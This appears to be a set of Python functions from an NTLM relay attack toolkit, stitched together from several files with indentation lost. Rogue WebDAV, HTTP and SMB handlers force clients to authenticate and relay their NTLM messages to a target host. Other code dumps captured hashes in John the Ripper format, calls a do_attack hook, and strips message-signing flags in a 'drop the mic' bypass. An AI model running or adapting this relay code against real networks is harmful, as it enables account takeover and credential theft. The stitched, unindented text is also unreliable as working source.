def do_PROPFIND(self):
proxy = False
if (".jpg" in self.path) or (".JPG" in self.path):
content = """<?xml version="1.0"?><D:multistatus xmlns:D="DAV:"><D:response><D:href>http://webdavrelay/file/image.JPG/</D:href><D:propstat><D:prop><D:creationdate>2016-11-12T22:00:22Z</D:creationdate><D:displayname>image.JPG</D:displayname><D:getcontentlength>4456</D:getcontentlength><D:getcontenttype>image/jpeg</D:getcontenttype><D:getetag>4ebabfcee4364434dacb043986abfffe</D:getetag><D:getlastmodified>Mon, 20 Mar 2017 00:00:22 GMT</D:getlastmodified><D:resourcetype></D:resourcetype><D:supportedlock></D:supportedlock><D:ishidden>0</D:ishidden></D:prop><D:status>HTTP/1.1 200 OK</D:status></D:propstat></D:response></D:multistatus>"""
else:
content = """<?xml version="1.0"?><D:multistatus xmlns:D="DAV:"><D:response><D:href>http://webdavrelay/file/</D:href><D:propstat><D:prop><D:creationdate>2016-11-12T22:00:22Z</D:creationdate><D:displayname>a</D:displayname><D:getcontentlength></D:getcontentlength><D:getcontenttype></D:getcontenttype><D:getetag></D:getetag><D:getlastmodified>Mon, 20 Mar 2017 00:00:22 GMT</D:getlastmodified><D:resourcetype><D:collection></D:collection></D:resourcetype><D:supportedlock></D:supportedlock><D:ishidden>0</D:ishidden></D:prop><D:status>HTTP/1.1 200 OK</D:status></D:propstat></D:response></D:multistatus>"""
messageType = 0
if self.headers.getheader('Authorization') is None:
self.do_AUTHHEAD(message='NTLM')
pass
else:
typeX = self.headers.getheader('Authorization')
try:
_, blob = typeX.split('NTLM')
token = base64.b64decode(blob.strip())
except:
self.do_AUTHHEAD()
messageType = struct.unpack(
'<L', token[len('NTLMSSP\x00'):len('NTLMSSP\x00') + 4])[0]
if messageType == 1:
if not self.do_ntlm_negotiate(token, proxy=proxy):
LOG.info("do negotiate failed, sending redirect")
self.do_REDIRECT()
elif messageType == 3:
authenticateMessage = ntlm.NTLMAuthChallengeResponse()
authenticateMessage.fromString(token)
if authenticateMessage[
'flags'] & ntlm.NTLMSSP_NEGOTIATE_UNICODE:
LOG.info(
"Authenticating against %s://%s as %s\\%s SUCCEED" %
(self.target.scheme, self.target.netloc,
authenticateMessage['domain_name'].decode('utf-16le'),
authenticateMessage['user_name'].decode('utf-16le')))
else:
LOG.info(
"Authenticating against %s://%s as %s\\%s SUCCEED" %
(self.target.scheme, self.target.netloc,
authenticateMessage['domain_name'].decode('ascii'),
authenticateMessage['user_name'].decode('ascii')))
self.do_ntlm_auth(token, authenticateMessage)
self.do_attack()
self.send_response(207, "Multi-Status")
self.send_header('Content-Type', 'application/xml')
self.send_header('Content-Length', str(len(content)))
self.end_headers()
self.wfile.write(content)
return
def _transport_send(self, rpc_packet, forceWriteAndx=0, forceRecv=0):
if self.__auth_level == ntlm.NTLM_AUTH_CALL:
if rpc_packet.get_type() == MSRPC_REQUEST:
response = ntlm.NTLMAuthChallengeResponse(
self.__username, self.__password, self._ntlm_challenge)
response['auth_ctx_id'] = self._ctx + 79231
response['auth_level'] = self.__auth_level
rpc_packet.set_auth_data(str(response))
if self.__auth_level in [
ntlm.NTLM_AUTH_PKT_INTEGRITY, ntlm.NTLM_AUTH_PKT_PRIVACY
]:
verifier = ntlm.NTLMAuthVerifier()
verifier['auth_level'] = self.__auth_level
verifier['auth_ctx_id'] = self._ctx + 79231
verifier['data'] = ' ' * 12
rpc_packet.set_auth_data(str(verifier))
rpc_call = rpc_packet.child()
if self.__auth_level == ntlm.NTLM_AUTH_PKT_PRIVACY:
data = DCERPC_RawCall(rpc_call.OP_NUM)
data.setData(self.cipher_encrypt(rpc_call.get_packet()))
rpc_packet.contains(data)
crc = crc32(rpc_call.get_packet())
data = pack('<LLL', 0, crc,
self.sequence) # XXX 0 can be anything: randomize
data = self.cipher_encrypt(data)
verifier['data'] = data
rpc_packet.set_auth_data(str(verifier))
self.sequence += 1
self._transport.send(rpc_packet.get_packet(),
forceWriteAndx=forceWriteAndx,
forceRecv=forceRecv)
def handle(self):
ntlm_negotiate_len = struct.unpack('h', self.request.recv(2))
ntlm_negotiate = self.request.recv(ntlm_negotiate_len[0])
if not self.do_ntlm_negotiate(ntlm_negotiate):
# Connection failed
LOG.error('Negotiating NTLM with %s://%s failed. Skipping to next target',
self.target.scheme, self.target.netloc)
self.server.config.target.logTarget(self.target)
else:
ntlm_chal_token = self.challengeMessage.getData()
self.request.sendall(struct.pack('h', len(ntlm_chal_token)))
self.request.sendall(ntlm_chal_token)
ntlm_auth_len = struct.unpack('h', self.request.recv(2))
ntlm_auth = self.request.recv(ntlm_auth_len[0])
authenticateMessage = ntlm.NTLMAuthChallengeResponse()
authenticateMessage.fromString(ntlm_auth)
if not self.do_ntlm_auth(ntlm_auth, authenticateMessage):
self.request.sendall(struct.pack('h', 1))
self.request.sendall(struct.pack('?', False))
if authenticateMessage['flags'] & ntlm.NTLMSSP_NEGOTIATE_UNICODE:
LOG.error("Authenticating against %s://%s as %s\\%s FAILED" % (
self.target.scheme, self.target.netloc,
authenticateMessage['domain_name'].decode('utf-16le'),
authenticateMessage['user_name'].decode('utf-16le')))
else:
LOG.error("Authenticating against %s://%s as %s\\%s FAILED" % (
self.target.scheme, self.target.netloc,
authenticateMessage['domain_name'].decode('ascii'),
authenticateMessage['user_name'].decode('ascii')))
else:
# Relay worked, do whatever we want here...
self.request.sendall(struct.pack('h', 1))
self.request.sendall(struct.pack('?', True))
if authenticateMessage['flags'] & ntlm.NTLMSSP_NEGOTIATE_UNICODE:
LOG.info("Authenticating against %s://%s as %s\\%s SUCCEED" % (
self.target.scheme, self.target.netloc, authenticateMessage['domain_name'].decode('utf-16le'),
authenticateMessage['user_name'].decode('utf-16le')))
else:
LOG.info("Authenticating against %s://%s as %s\\%s SUCCEED" % (
self.target.scheme, self.target.netloc, authenticateMessage['domain_name'].decode('ascii'),
authenticateMessage['user_name'].decode('ascii')))
ntlm_hash_data = outputToJohnFormat(self.challengeMessage['challenge'],
authenticateMessage['user_name'],
authenticateMessage['domain_name'],
authenticateMessage['lanman'], authenticateMessage['ntlm'])
self.client.sessionData['JOHN_OUTPUT'] = ntlm_hash_data
if self.server.config.outputFile is not None:
writeJohnOutputToFile(ntlm_hash_data['hash_string'], ntlm_hash_data['hash_version'],
self.server.config.outputFile)
self.server.config.target.logTarget(self.target, True, self.authUser)
self.do_attack()
def smbComSessionSetupAndX(packet, packetNum, SMBCommand, questions, replies):
# Test return code is always 0, otherwise leave before doing anything
if packet['ErrorCode'] != 0:
if packet['ErrorClass'] != 0x16:
return False
print "SMB_COM_SESSION_SETUP_ANDX ",
try:
if (packet['Flags1'] & smb.SMB.FLAGS1_REPLY) == 0:
# Query
if SMBCommand['WordCount'] == 12:
# Extended Security
sessionSetupParameters = smb.SMBSessionSetupAndX_Extended_Parameters(
SMBCommand['Parameters'])
sessionSetupData = smb.SMBSessionSetupAndX_Extended_Data()
sessionSetupData[
'SecurityBlobLength'] = sessionSetupParameters[
'SecurityBlobLength']
sessionSetupData.fromString(SMBCommand['Data'])
if struct.unpack('B', sessionSetupData['SecurityBlob']
[0])[0] != smb.ASN1_AID:
# If there no GSSAPI ID, it must be an AUTH packet
blob = smb.SPNEGO_NegTokenResp(
sessionSetupData['SecurityBlob'])
token = blob['ResponseToken']
else:
# NEGOTIATE packet
blob = smb.SPNEGO_NegTokenInit(
sessionSetupData['SecurityBlob'])
token = blob['MechToken']
messageType = struct.unpack(
'<L', token[len('NTLMSSP\x00'):len('NTLMSSP\x00') + 4])[0]
if messageType == 0x01:
# NEGOTIATE_MESSAGE
negotiateMessage = ntlm.NTLMAuthNegotiate()
negotiateMessage.fromString(token)
elif messageType == 0x03:
# AUTHENTICATE_MESSAGE, here we deal with authentication
authenticateMessage = ntlm.NTLMAuthChallengeResponse()
authenticateMessage.fromString(token)
else:
# Standard Security
sessionSetupParameters = smb.SMBSessionSetupAndX_Parameters(
SMBCommand['Parameters'])
sessionSetupData = smb.SMBSessionSetupAndX_Data()
sessionSetupData['AnsiPwdLength'] = sessionSetupParameters[
'AnsiPwdLength']
sessionSetupData['UnicodePwdLength'] = sessionSetupParameters[
'UnicodePwdLength']
sessionSetupData.fromString(SMBCommand['Data'])
else:
# Response
if SMBCommand['WordCount'] == 4:
# Extended Security
sessionResponse = SMBCommand
sessionParameters = smb.SMBSessionSetupAndX_Extended_Response_Parameters(
sessionResponse['Parameters'])
sessionData = smb.SMBSessionSetupAndX_Extended_Response_Data(
flags=packet['Flags2'])
sessionData['SecurityBlobLength'] = sessionParameters[
'SecurityBlobLength']
sessionData.fromString(sessionResponse['Data'])
respToken = smb.SPNEGO_NegTokenResp(
sessionData['SecurityBlob'])
if respToken.fields.has_key('ResponseToken'):
# Let's parse some data and keep it to ourselves in case it is asked
ntlmChallenge = ntlm.NTLMAuthChallenge(
respToken['ResponseToken'])
if ntlmChallenge['TargetInfoFields_len'] > 0:
infoFields = ntlmChallenge['TargetInfoFields']
av_pairs = ntlm.AV_PAIRS(
ntlmChallenge['TargetInfoFields']
[:ntlmChallenge['TargetInfoFields_len']])
if av_pairs[ntlm.NTLMSSP_AV_HOSTNAME] is not None:
__server_name = av_pairs[
ntlm.NTLMSSP_AV_HOSTNAME][1].decode('utf-16le')
if av_pairs[ntlm.NTLMSSP_AV_DOMAINNAME] is not None:
__server_domain = av_pairs[
ntlm.NTLMSSP_AV_DOMAINNAME][1].decode(
'utf-16le')
else:
# Standard Security
sessionResponse = SMBCommand
sessionParameters = smb.SMBSessionSetupAndXResponse_Parameters(
sessionResponse['Parameters'])
sessionData = smb.SMBSessionSetupAndXResponse_Data(
flags=packet['Flags2'], data=sessionResponse['Data'])
except Exception, e:
print "ERROR: %s" % e
print "Command: 0x%x" % packet['Command']
print "Packet: %d %r" % (packetNum, packet.getData())
return True
def SmbSessionSetup(self, connId, smbServer, recvPacket):
connData = smbServer.getConnectionData(connId, checkStatus=False)
respSMBCommand = smb3.SMB2SessionSetup_Response()
sessionSetupData = smb3.SMB2SessionSetup(recvPacket['Data'])
connData['Capabilities'] = sessionSetupData['Capabilities']
securityBlob = sessionSetupData['Buffer']
rawNTLM = False
if struct.unpack('B', securityBlob[0:1])[0] == ASN1_AID:
# NEGOTIATE packet
blob = SPNEGO_NegTokenInit(securityBlob)
token = blob['MechToken']
if len(blob['MechTypes'][0]) > 0:
# Is this GSSAPI NTLM or something else we don't support?
mechType = blob['MechTypes'][0]
if mechType != TypesMech['NTLMSSP - Microsoft NTLM Security Support Provider'] and \
mechType != TypesMech['NEGOEX - SPNEGO Extended Negotiation Security Mechanism']:
# Nope, do we know it?
if mechType in MechTypes:
mechStr = MechTypes[mechType]
else:
mechStr = hexlify(mechType)
smbServer.log("Unsupported MechType '%s'" % mechStr,
logging.CRITICAL)
# We don't know the token, we answer back again saying
# we just support NTLM.
# ToDo: Build this into a SPNEGO_NegTokenResp()
respToken = b'\xa1\x15\x30\x13\xa0\x03\x0a\x01\x03\xa1\x0c\x06\x0a\x2b\x06\x01\x04\x01\x82\x37\x02\x02\x0a'
respSMBCommand['SecurityBufferOffset'] = 0x48
respSMBCommand['SecurityBufferLength'] = len(respToken)
respSMBCommand['Buffer'] = respToken
return [respSMBCommand
], None, STATUS_MORE_PROCESSING_REQUIRED
elif struct.unpack('B', securityBlob[0:1])[0] == ASN1_SUPPORTED_MECH:
# AUTH packet
blob = SPNEGO_NegTokenResp(securityBlob)
token = blob['ResponseToken']
else:
# No GSSAPI stuff, raw NTLMSSP
rawNTLM = True
token = securityBlob
# Here we only handle NTLMSSP, depending on what stage of the
# authentication we are, we act on it
messageType = struct.unpack(
'<L', token[len('NTLMSSP\x00'):len('NTLMSSP\x00') + 4])[0]
if messageType == 0x01:
# NEGOTIATE_MESSAGE
negotiateMessage = ntlm.NTLMAuthNegotiate()
negotiateMessage.fromString(token)
# Let's store it in the connection data
connData['NEGOTIATE_MESSAGE'] = negotiateMessage
#############################################################
# SMBRelay: Ok.. So we got a NEGOTIATE_MESSAGE from a client.
# Let's send it to the target server and send the answer back to the client.
client = connData['SMBClient']
try:
challengeMessage = self.do_ntlm_negotiate(client, token)
except Exception as e:
LOG.debug("Exception:", exc_info=True)
# Log this target as processed for this client
self.targetprocessor.logTarget(self.target)
# Raise exception again to pass it on to the SMB server
raise
#############################################################
if rawNTLM is False:
respToken = SPNEGO_NegTokenResp()
# accept-incomplete. We want more data
respToken['NegResult'] = b'\x01'
respToken['SupportedMech'] = TypesMech[
'NTLMSSP - Microsoft NTLM Security Support Provider']
respToken['ResponseToken'] = challengeMessage.getData()
else:
respToken = challengeMessage
# Setting the packet to STATUS_MORE_PROCESSING
errorCode = STATUS_MORE_PROCESSING_REQUIRED
# Let's set up an UID for this connection and store it
# in the connection's data
connData['Uid'] = random.randint(1, 0xffffffff)
connData['CHALLENGE_MESSAGE'] = challengeMessage
elif messageType == 0x02:
# CHALLENGE_MESSAGE
raise Exception('Challenge Message raise, not implemented!')
elif messageType == 0x03:
# AUTHENTICATE_MESSAGE, here we deal with authentication
#############################################################
# SMBRelay: Ok, so now the have the Auth token, let's send it
# back to the target system and hope for the best.
client = connData['SMBClient']
authenticateMessage = ntlm.NTLMAuthChallengeResponse()
authenticateMessage.fromString(token)
if authenticateMessage['user_name'] != '':
# For some attacks it is important to know the authenticated username, so we store it
self.authUser = (
'%s/%s' %
(authenticateMessage['domain_name'].decode('utf-16le'),
authenticateMessage['user_name'].decode('utf-16le'))
).upper()
if rawNTLM is True:
respToken2 = SPNEGO_NegTokenResp()
respToken2['ResponseToken'] = securityBlob
securityBlob = respToken2.getData()
clientResponse, errorCode = self.do_ntlm_auth(
client, token, connData['CHALLENGE_MESSAGE']['challenge'])
else:
# Anonymous login, send STATUS_ACCESS_DENIED so we force the client to send his credentials
errorCode = STATUS_ACCESS_DENIED
if errorCode != STATUS_SUCCESS:
#Log this target as processed for this client
self.targetprocessor.logTarget(self.target)
LOG.error(
"Authenticating against %s://%s as %s\\%s FAILED" %
(self.target.scheme, self.target.netloc,
authenticateMessage['domain_name'].decode('utf-16le'),
authenticateMessage['user_name'].decode('utf-16le')))
client.killConnection()
else:
# We have a session, create a thread and do whatever we want
LOG.critical(
"Authenticating against %s://%s as %s\\%s SUCCEED" %
(self.target.scheme, self.target.netloc,
authenticateMessage['domain_name'].decode('utf-16le'),
authenticateMessage['user_name'].decode('utf-16le')))
# Log this target as processed for this client
self.targetprocessor.logTarget(self.target, True,
self.authUser)
ntlm_hash_data = outputToJohnFormat(
connData['CHALLENGE_MESSAGE']['challenge'],
authenticateMessage['user_name'],
authenticateMessage['domain_name'],
authenticateMessage['lanman'], authenticateMessage['ntlm'])
client.sessionData['JOHN_OUTPUT'] = ntlm_hash_data
if self.server.getJTRdumpPath() != '':
writeJohnOutputToFile(ntlm_hash_data['hash_string'],
ntlm_hash_data['hash_version'],
self.server.getJTRdumpPath())
connData['Authenticated'] = True
self.do_attack(client)
# Now continue with the server
#############################################################
respToken = SPNEGO_NegTokenResp()
# accept-completed
respToken['NegResult'] = b'\x00'
# Let's store it in the connection data
connData['AUTHENTICATE_MESSAGE'] = authenticateMessage
else:
raise Exception("Unknown NTLMSSP MessageType %d" % messageType)
respSMBCommand['SecurityBufferOffset'] = 0x48
respSMBCommand['SecurityBufferLength'] = len(respToken)
respSMBCommand['Buffer'] = respToken.getData()
smbServer.setConnectionData(connId, connData)
return [respSMBCommand], None, errorCode
def SmbSessionSetupAndX(self, connId, smbServer, SMBCommand, recvPacket):
connData = smbServer.getConnectionData(connId, checkStatus=False)
#############################################################
# SMBRelay
# Are we ready to relay or should we just do local auth?
if 'relayToHost' not in connData:
# Just call the original SessionSetup
return self.origSmbSessionSetupAndX(connId, smbServer, SMBCommand,
recvPacket)
# We have confirmed we want to relay to the target host.
respSMBCommand = smb.SMBCommand(smb.SMB.SMB_COM_SESSION_SETUP_ANDX)
if connData['_dialects_parameters'][
'Capabilities'] & smb.SMB.CAP_EXTENDED_SECURITY:
# Extended security. Here we deal with all SPNEGO stuff
respParameters = smb.SMBSessionSetupAndX_Extended_Response_Parameters(
)
respData = smb.SMBSessionSetupAndX_Extended_Response_Data()
sessionSetupParameters = smb.SMBSessionSetupAndX_Extended_Parameters(
SMBCommand['Parameters'])
sessionSetupData = smb.SMBSessionSetupAndX_Extended_Data()
sessionSetupData['SecurityBlobLength'] = sessionSetupParameters[
'SecurityBlobLength']
sessionSetupData.fromString(SMBCommand['Data'])
connData['Capabilities'] = sessionSetupParameters['Capabilities']
rawNTLM = False
if struct.unpack(
'B', sessionSetupData['SecurityBlob'][0:1])[0] != ASN1_AID:
# If there no GSSAPI ID, it must be an AUTH packet
blob = SPNEGO_NegTokenResp(sessionSetupData['SecurityBlob'])
token = blob['ResponseToken']
else:
# NEGOTIATE packet
blob = SPNEGO_NegTokenInit(sessionSetupData['SecurityBlob'])
token = blob['MechToken']
# Here we only handle NTLMSSP, depending on what stage of the
# authentication we are, we act on it
messageType = struct.unpack(
'<L', token[len('NTLMSSP\x00'):len('NTLMSSP\x00') + 4])[0]
if messageType == 0x01:
# NEGOTIATE_MESSAGE
negotiateMessage = ntlm.NTLMAuthNegotiate()
negotiateMessage.fromString(token)
# Let's store it in the connection data
connData['NEGOTIATE_MESSAGE'] = negotiateMessage
#############################################################
# SMBRelay: Ok.. So we got a NEGOTIATE_MESSAGE from a client.
# Let's send it to the target server and send the answer back to the client.
client = connData['SMBClient']
try:
challengeMessage = self.do_ntlm_negotiate(client, token)
except Exception:
# Log this target as processed for this client
self.targetprocessor.logTarget(self.target)
# Raise exception again to pass it on to the SMB server
raise
#############################################################
respToken = SPNEGO_NegTokenResp()
# accept-incomplete. We want more data
respToken['NegState'] = b'\x01'
respToken['SupportedMech'] = TypesMech[
'NTLMSSP - Microsoft NTLM Security Support Provider']
respToken['ResponseToken'] = challengeMessage.getData()
# Setting the packet to STATUS_MORE_PROCESSING
errorCode = STATUS_MORE_PROCESSING_REQUIRED
# Let's set up an UID for this connection and store it
# in the connection's data
# Picking a fixed value
# TODO: Manage more UIDs for the same session
connData['Uid'] = 10
connData['CHALLENGE_MESSAGE'] = challengeMessage
elif messageType == 0x03:
# AUTHENTICATE_MESSAGE, here we deal with authentication
#############################################################
# SMBRelay: Ok, so now the have the Auth token, let's send it
# back to the target system and hope for the best.
client = connData['SMBClient']
authenticateMessage = ntlm.NTLMAuthChallengeResponse()
authenticateMessage.fromString(token)
if authenticateMessage['user_name'] != '':
#For some attacks it is important to know the authenticated username, so we store it
self.authUser = (
'%s/%s' %
(authenticateMessage['domain_name'].decode('utf-16le'),
authenticateMessage['user_name'].decode('utf-16le'))
).upper()
clientResponse, errorCode = self.do_ntlm_auth(
client, sessionSetupData['SecurityBlob'],
connData['CHALLENGE_MESSAGE']['challenge'])
else:
# Anonymous login, send STATUS_ACCESS_DENIED so we force the client to send his credentials
errorCode = STATUS_ACCESS_DENIED
if errorCode != STATUS_SUCCESS:
# Let's return what the target returned, hope the client connects back again
packet = smb.NewSMBPacket()
packet[
'Flags1'] = smb.SMB.FLAGS1_REPLY | smb.SMB.FLAGS1_PATHCASELESS
packet[
'Flags2'] = smb.SMB.FLAGS2_NT_STATUS | smb.SMB.FLAGS2_EXTENDED_SECURITY
packet['Command'] = recvPacket['Command']
packet['Pid'] = recvPacket['Pid']
packet['Tid'] = recvPacket['Tid']
packet['Mid'] = recvPacket['Mid']
packet['Uid'] = recvPacket['Uid']
packet['Data'] = b'\x00\x00\x00'
packet['ErrorCode'] = errorCode >> 16
packet['ErrorClass'] = errorCode & 0xff
LOG.error("Authenticating against %s://%s as %s FAILED" %
(self.target.scheme, self.target.netloc,
self.authUser))
#Log this target as processed for this client
self.targetprocessor.logTarget(self.target)
client.killConnection()
return None, [packet], errorCode
else:
# We have a session, create a thread and do whatever we want
LOG.info("Authenticating against %s://%s as %s SUCCEED" %
(self.target.scheme, self.target.netloc,
self.authUser))
# Log this target as processed for this client
self.targetprocessor.logTarget(self.target, True,
self.authUser)
ntlm_hash_data = outputToJohnFormat(
connData['CHALLENGE_MESSAGE']['challenge'],
authenticateMessage['user_name'],
authenticateMessage['domain_name'],
authenticateMessage['lanman'],
authenticateMessage['ntlm'])
client.sessionData['JOHN_OUTPUT'] = ntlm_hash_data
if self.server.getJTRdumpPath() != '':
writeJohnOutputToFile(ntlm_hash_data['hash_string'],
ntlm_hash_data['hash_version'],
self.server.getJTRdumpPath())
self.do_attack(client)
# Now continue with the server
#############################################################
respToken = SPNEGO_NegTokenResp()
# accept-completed
respToken['NegState'] = b'\x00'
# Done with the relay for now.
connData['Authenticated'] = True
del (connData['relayToHost'])
# Status SUCCESS
errorCode = STATUS_SUCCESS
# Let's store it in the connection data
connData['AUTHENTICATE_MESSAGE'] = authenticateMessage
else:
raise Exception("Unknown NTLMSSP MessageType %d" % messageType)
respParameters['SecurityBlobLength'] = len(respToken)
respData['SecurityBlobLength'] = respParameters[
'SecurityBlobLength']
respData['SecurityBlob'] = respToken.getData()
else:
# Process Standard Security
#TODO: Fix this for other protocols than SMB [!]
respParameters = smb.SMBSessionSetupAndXResponse_Parameters()
respData = smb.SMBSessionSetupAndXResponse_Data()
sessionSetupParameters = smb.SMBSessionSetupAndX_Parameters(
SMBCommand['Parameters'])
sessionSetupData = smb.SMBSessionSetupAndX_Data()
sessionSetupData['AnsiPwdLength'] = sessionSetupParameters[
'AnsiPwdLength']
sessionSetupData['UnicodePwdLength'] = sessionSetupParameters[
'UnicodePwdLength']
sessionSetupData.fromString(SMBCommand['Data'])
client = connData['SMBClient']
_, errorCode = client.sendStandardSecurityAuth(sessionSetupData)
if errorCode != STATUS_SUCCESS:
# Let's return what the target returned, hope the client connects back again
packet = smb.NewSMBPacket()
packet[
'Flags1'] = smb.SMB.FLAGS1_REPLY | smb.SMB.FLAGS1_PATHCASELESS
packet[
'Flags2'] = smb.SMB.FLAGS2_NT_STATUS | smb.SMB.FLAGS2_EXTENDED_SECURITY
packet['Command'] = recvPacket['Command']
packet['Pid'] = recvPacket['Pid']
packet['Tid'] = recvPacket['Tid']
packet['Mid'] = recvPacket['Mid']
packet['Uid'] = recvPacket['Uid']
packet['Data'] = b'\x00\x00\x00'
packet['ErrorCode'] = errorCode >> 16
packet['ErrorClass'] = errorCode & 0xff
#Log this target as processed for this client
self.targetprocessor.logTarget(self.target)
# Finish client's connection
#client.killConnection()
return None, [packet], errorCode
else:
# We have a session, create a thread and do whatever we want
self.authUser = ('%s/%s' %
(sessionSetupData['PrimaryDomain'],
sessionSetupData['Account'])).upper()
LOG.info(
"Authenticating against %s://%s as %s SUCCEED" %
(self.target.scheme, self.target.netloc, self.authUser))
# Log this target as processed for this client
self.targetprocessor.logTarget(self.target, True,
self.authUser)
ntlm_hash_data = outputToJohnFormat(
'', sessionSetupData['Account'],
sessionSetupData['PrimaryDomain'],
sessionSetupData['AnsiPwd'],
sessionSetupData['UnicodePwd'])
client.sessionData['JOHN_OUTPUT'] = ntlm_hash_data
if self.server.getJTRdumpPath() != '':
writeJohnOutputToFile(ntlm_hash_data['hash_string'],
ntlm_hash_data['hash_version'],
self.server.getJTRdumpPath())
# Done with the relay for now.
connData['Authenticated'] = True
del (connData['relayToHost'])
self.do_attack(client)
# Now continue with the server
#############################################################
respData['NativeOS'] = smbServer.getServerOS()
respData['NativeLanMan'] = smbServer.getServerOS()
respSMBCommand['Parameters'] = respParameters
respSMBCommand['Data'] = respData
smbServer.setConnectionData(connId, connData)
return [respSMBCommand], None, errorCode
def mod_getNTLMSSPType3(type1,
type2,
user,
password,
domain,
lmhash='',
nthash='',
use_ntlmv2=USE_NTLMv2):
# Safety check in case somebody sent password = None.. That's not allowed. Setting it to '' and hope for the best.
if password is None:
password = ''
# Let's do some encoding checks before moving on. Kind of dirty, but found effective when dealing with
# international characters.
import sys
encoding = sys.getfilesystemencoding()
if encoding is not None:
try:
user.encode('utf-16le')
except:
user = user.decode(encoding)
try:
password.encode('utf-16le')
except:
password = password.decode(encoding)
try:
domain.encode('utf-16le')
except:
domain = user.decode(encoding)
ntlmChallenge = ntlm.NTLMAuthChallenge(type2)
# Let's start with the original flags sent in the type1 message
responseFlags = type1['flags']
# Token received and parsed. Depending on the authentication
# method we will create a valid ChallengeResponse
ntlmChallengeResponse = ntlm.NTLMAuthChallengeResponse(
user, password, ntlmChallenge['challenge'])
clientChallenge = ntlm.b("".join([
random.choice(string.digits + string.ascii_letters) for _ in range(8)
]))
serverName = ntlmChallenge['TargetInfoFields']
ntResponse, lmResponse, sessionBaseKey = ntlm.computeResponse(
ntlmChallenge['flags'], ntlmChallenge['challenge'], clientChallenge,
serverName, domain, user, password, lmhash, nthash, use_ntlmv2)
# Let's check the return flags
if (ntlmChallenge['flags']
& ntlm.NTLMSSP_NEGOTIATE_EXTENDED_SESSIONSECURITY) == 0:
# No extended session security, taking it out
responseFlags &= 0xffffffff ^ ntlm.NTLMSSP_NEGOTIATE_EXTENDED_SESSIONSECURITY
if (ntlmChallenge['flags'] & ntlm.NTLMSSP_NEGOTIATE_128) == 0:
# No support for 128 key len, taking it out
responseFlags &= 0xffffffff ^ ntlm.NTLMSSP_NEGOTIATE_128
if (ntlmChallenge['flags'] & ntlm.NTLMSSP_NEGOTIATE_KEY_EXCH) == 0:
# No key exchange supported, taking it out
responseFlags &= 0xffffffff ^ ntlm.NTLMSSP_NEGOTIATE_KEY_EXCH
# drop the mic need to unset these flags
if (ntlmChallenge['flags'] & ntlm.NTLMSSP_NEGOTIATE_SEAL) != 0:
responseFlags ^= ntlm.NTLMSSP_NEGOTIATE_SEAL
if (ntlmChallenge['flags'] & ntlm.NTLMSSP_NEGOTIATE_SIGN) != 0:
responseFlags ^= ntlm.NTLMSSP_NEGOTIATE_SIGN
if (ntlmChallenge['flags'] & ntlm.NTLMSSP_NEGOTIATE_ALWAYS_SIGN) != 0:
responseFlags ^= ntlm.NTLMSSP_NEGOTIATE_ALWAYS_SIGN
keyExchangeKey = ntlm.KXKEY(ntlmChallenge['flags'], sessionBaseKey,
lmResponse, ntlmChallenge['challenge'],
password, lmhash, nthash, use_ntlmv2)
# Special case for anonymous login
if user == '' and password == '' and lmhash == '' and nthash == '':
keyExchangeKey = b'\x00' * 16
if ntlmChallenge['flags'] & ntlm.NTLMSSP_NEGOTIATE_KEY_EXCH:
exportedSessionKey = ntlm.b("".join([
random.choice(string.digits + string.ascii_letters)
for _ in range(16)
]))
encryptedRandomSessionKey = ntlm.generateEncryptedSessionKey(
keyExchangeKey, exportedSessionKey)
else:
encryptedRandomSessionKey = None
exportedSessionKey = keyExchangeKey
ntlmChallengeResponse['flags'] = responseFlags
ntlmChallengeResponse['domain_name'] = domain.encode('utf-16le')
ntlmChallengeResponse['host_name'] = type1.getWorkstation().encode(
'utf-16le')
if lmResponse == '':
ntlmChallengeResponse['lanman'] = b'\x00'
else:
ntlmChallengeResponse['lanman'] = lmResponse
ntlmChallengeResponse['ntlm'] = ntResponse
if encryptedRandomSessionKey is not None:
ntlmChallengeResponse['session_key'] = encryptedRandomSessionKey
return ntlmChallengeResponse, exportedSessionKey
def do_local_auth(self, messageType, token, proxy):
if messageType == 1:
negotiateMessage = ntlm.NTLMAuthNegotiate()
negotiateMessage.fromString(token)
ansFlags = 0
if negotiateMessage['flags'] & ntlm.NTLMSSP_NEGOTIATE_56:
ansFlags |= ntlm.NTLMSSP_NEGOTIATE_56
if negotiateMessage['flags'] & ntlm.NTLMSSP_NEGOTIATE_128:
ansFlags |= ntlm.NTLMSSP_NEGOTIATE_128
if negotiateMessage['flags'] & ntlm.NTLMSSP_NEGOTIATE_KEY_EXCH:
ansFlags |= ntlm.NTLMSSP_NEGOTIATE_KEY_EXCH
if negotiateMessage[
'flags'] & ntlm.NTLMSSP_NEGOTIATE_EXTENDED_SESSIONSECURITY:
ansFlags |= ntlm.NTLMSSP_NEGOTIATE_EXTENDED_SESSIONSECURITY
if negotiateMessage['flags'] & ntlm.NTLMSSP_NEGOTIATE_UNICODE:
ansFlags |= ntlm.NTLMSSP_NEGOTIATE_UNICODE
if negotiateMessage['flags'] & ntlm.NTLM_NEGOTIATE_OEM:
ansFlags |= ntlm.NTLM_NEGOTIATE_OEM
ansFlags |= ntlm.NTLMSSP_NEGOTIATE_VERSION | ntlm.NTLMSSP_NEGOTIATE_TARGET_INFO | \
ntlm.NTLMSSP_TARGET_TYPE_SERVER | ntlm.NTLMSSP_NEGOTIATE_NTLM
challengeMessage = ntlm.NTLMAuthChallenge()
challengeMessage['flags'] = ansFlags
challengeMessage['domain_name'] = ""
challengeMessage['challenge'] = ''.join(
random.choice(string.printable) for _ in range(64))
challengeMessage['TargetInfoFields'] = ntlm.AV_PAIRS()
challengeMessage['TargetInfoFields_len'] = 0
challengeMessage['TargetInfoFields_max_len'] = 0
challengeMessage['TargetInfoFields_offset'] = 40 + 16
challengeMessage['Version'] = b'\xff' * 8
challengeMessage['VersionLen'] = 8
self.do_AUTHHEAD(message=b'NTLM ' +
base64.b64encode(challengeMessage.getData()),
proxy=proxy)
return
elif messageType == 3:
authenticateMessage = ntlm.NTLMAuthChallengeResponse()
authenticateMessage.fromString(token)
if authenticateMessage[
'flags'] & ntlm.NTLMSSP_NEGOTIATE_UNICODE:
self.authUser = (
'%s/%s' %
(authenticateMessage['domain_name'].decode('utf-16le'),
authenticateMessage['user_name'].decode('utf-16le'))
).upper()
else:
self.authUser = (
'%s/%s' %
(authenticateMessage['domain_name'].decode('ascii'),
authenticateMessage['user_name'].decode('ascii'))
).upper()
self.target = self.server.config.target.getTarget(
identity=self.authUser)
if self.target is None:
LOG.info(
"HTTPD(%s): Connection from %s@%s controlled, but there are no more targets left!"
% (self.server.server_address[1], self.authUser,
self.client_address[0]))
self.send_not_found()
return
LOG.info(
